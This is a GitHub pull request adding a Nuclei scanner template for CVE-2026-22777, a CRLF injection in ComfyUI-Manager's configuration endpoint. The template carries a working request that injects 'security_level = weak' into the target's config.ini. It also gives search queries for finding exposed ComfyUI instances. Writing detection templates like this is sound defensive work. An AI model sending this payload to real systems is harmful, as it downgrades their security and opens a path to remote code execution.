Skip to content

Add CVE-2026-22777 - ComfyUI-Manager CRLF Injection in Configuration Endpoint #15942

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
LK-maker-007 wants to merge 1 commit into
base: main
Choose a base branch
from
+77 −0
Open

Add CVE-2026-22777 - ComfyUI-Manager CRLF Injection in Configuration Endpoint #15942

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
77 changes: 77 additions & 0 deletions http/cves/2026/CVE-2026-22777.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
id: CVE-2026-22777

info:
name: ComfyUI-Manager - CRLF Injection via Configuration Endpoint
author: LK-maker-007
severity: high
description: |
ComfyUI-Manager versions prior to 3.39.2 (and 4.0.0 through 4.0.4) are vulnerable to
CRLF injection in the /api/manager/db_mode configuration endpoint. The write_config()
function does not sanitize carriage return (\r) or newline (\n) characters from
user-supplied query parameter values before writing to the config.ini file. An
unauthenticated attacker can inject arbitrary key-value pairs, including downgrading
security_level from normal to weak, enabling subsequent remote code execution via the
same chain as CVE-2025-67303. Exploitation requires ComfyUI to be started with the
--listen flag (network-accessible mode).
impact: |
An unauthenticated attacker can overwrite security-critical configuration values
including security_level=weak, which unlocks custom node installation. This enables
subsequent remote code execution through a malicious custom node.
remediation: |
Upgrade ComfyUI-Manager to version 3.39.2 or 4.0.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-22777
- https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2
- https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2026-22777
cwe-id: CWE-93
epss-score: 0.00015
epss-percentile: 0.03132
cpe: cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: comfy
product: comfyui-manager
shodan-query: http.title:"ComfyUI" http.html:"/api/manager"
fofa-query: title="ComfyUI"
tags: cve,cve2026,comfyui,crlf,injection,config-injection,intrusive,vuln

flow: http(1) && http(2) && http(3)

http:
- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- '!contains(body, "<html")'
condition: and
internal: true

- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true

- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "security_level = weak")'
condition: and